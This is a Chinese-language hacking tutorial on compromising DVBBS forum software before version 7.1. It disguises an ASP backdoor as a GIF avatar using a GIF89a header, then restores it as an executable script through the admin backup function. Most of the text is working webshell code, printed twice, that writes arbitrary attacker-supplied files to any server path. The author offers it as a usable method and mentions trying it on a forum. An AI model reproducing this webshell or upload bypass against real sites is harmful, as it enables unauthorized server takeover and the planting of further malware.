GIF89a结合动网后台(7.1以前)取得webshell的完整解释
文章编辑:NetHacking 来源:http://www.powers.com.cn 作者:喜欢忧伤
背景:
(1)动网上传文件,备份得到后门
(2)使用GIF89a可以上传内容为木马的gif图片:逃过头像上传的检测。
所以产生了新的方法:上传gif头像图片,备份得到木马了。(使用范围为:动网7.1以前的版本)
但是很多人在执行后门后出现的是一张不能显示的图片.
偶还是公布一下我用了恩久的更方便的方法,同时解释一下为什么会出现这种情况.:
就是GIF89a加站长助手,运行后门的时候看到的就是站长助手的界面,唯一的不同就是左上角多了GIF89a几个字。这个方法在一看到背景(2)就用在一个论坛的测试上了。。呵呵
gif内容如下:
—–以下为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)—-
GIF89a
<%
‘站长助手的内容…省略...
%>
</body>
</center>
—–以上为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)—-
其实真正问题是这样的:
执行由gif文件恢复过来的asp,最后显示成一张不能显示的图片:
其实这个过程有两个:
(1)asp解释执行
(2)你的浏览器的显示.
(1)是没有问题.
现在问题是出在你的(2)上面的.
(2)出问题的原因是浏览器的解释问题.
解决办法:只要把显示的代码放到<body></body>之间就可以了.
本来是这样的:执行后显示一张不能显示的图片.
GIF89a
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject(“Scripting.FileSystemObject”) %>
<% if Trim(request(“syfdpath”))<>”” then %>
<% fdata = request(“cyfddata”) %>
<% Set objCountFile=objFSO.createTextFile(request(“syfdpath”),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write “<font color=red>save Success!</font>” %>
<% else %>
<% response.write “<font color=red>Save UnSuccess!</font>” %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write “<form action=” method=post>” %>
<% Response.write “保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>” %>
<% Response.Write “<input type=text name=syfdpath width=32 size=50>” %>
<% Response.Write “<br>” %>
<% Response.write “本文件绝对路径” %>
<% =server.mappath(Request.ServerVariables(“SCRIPT_NAME”)) %>
<% Response.write “<br>” %>
<% Response.write “输入马的内容:” %>
<% Response.write “<textarea name=cyfddata cols=80 rows=10 width=32></textarea>” %>
<% Response.write “<input type=submit value=保存>” %>
<% Response.write “</form>” %>
修改后:执行正常了。.后门就正常使用了。.哈哈
GIF89a
<body>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject(“Scripting.FileSystemObject”) %>
<% if Trim(request(“syfdpath”))<>”” then %>
<% fdata = request(“cyfddata”) %>
<% Set objCountFile=objFSO.createTextFile(request(“syfdpath”),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write “<font color=red>save Success!</font>” %>
<% else %>
<% response.write “<font color=red>Save UnSuccess!</font>” %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write “<form action=” method=post>” %>
<% Response.write “保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>” %>
<% Response.Write “<input type=text name=syfdpath width=32 size=50>” %>
<% Response.Write “<br>” %>
<% Response.write “本文件绝对路径” %>
<% =server.mappath(Request.ServerVariables(“SCRIPT_NAME”)) %>
<% Response.write “<br>” %>
<% Response.write “输入马的内容:” %>
<% Response.write “<textarea name=cyfddata cols=80 rows=10 width=32></textarea>” %>
<% Response.write “<input type=submit value=保存>” %>
<% Response.write “</form>” %>
</body>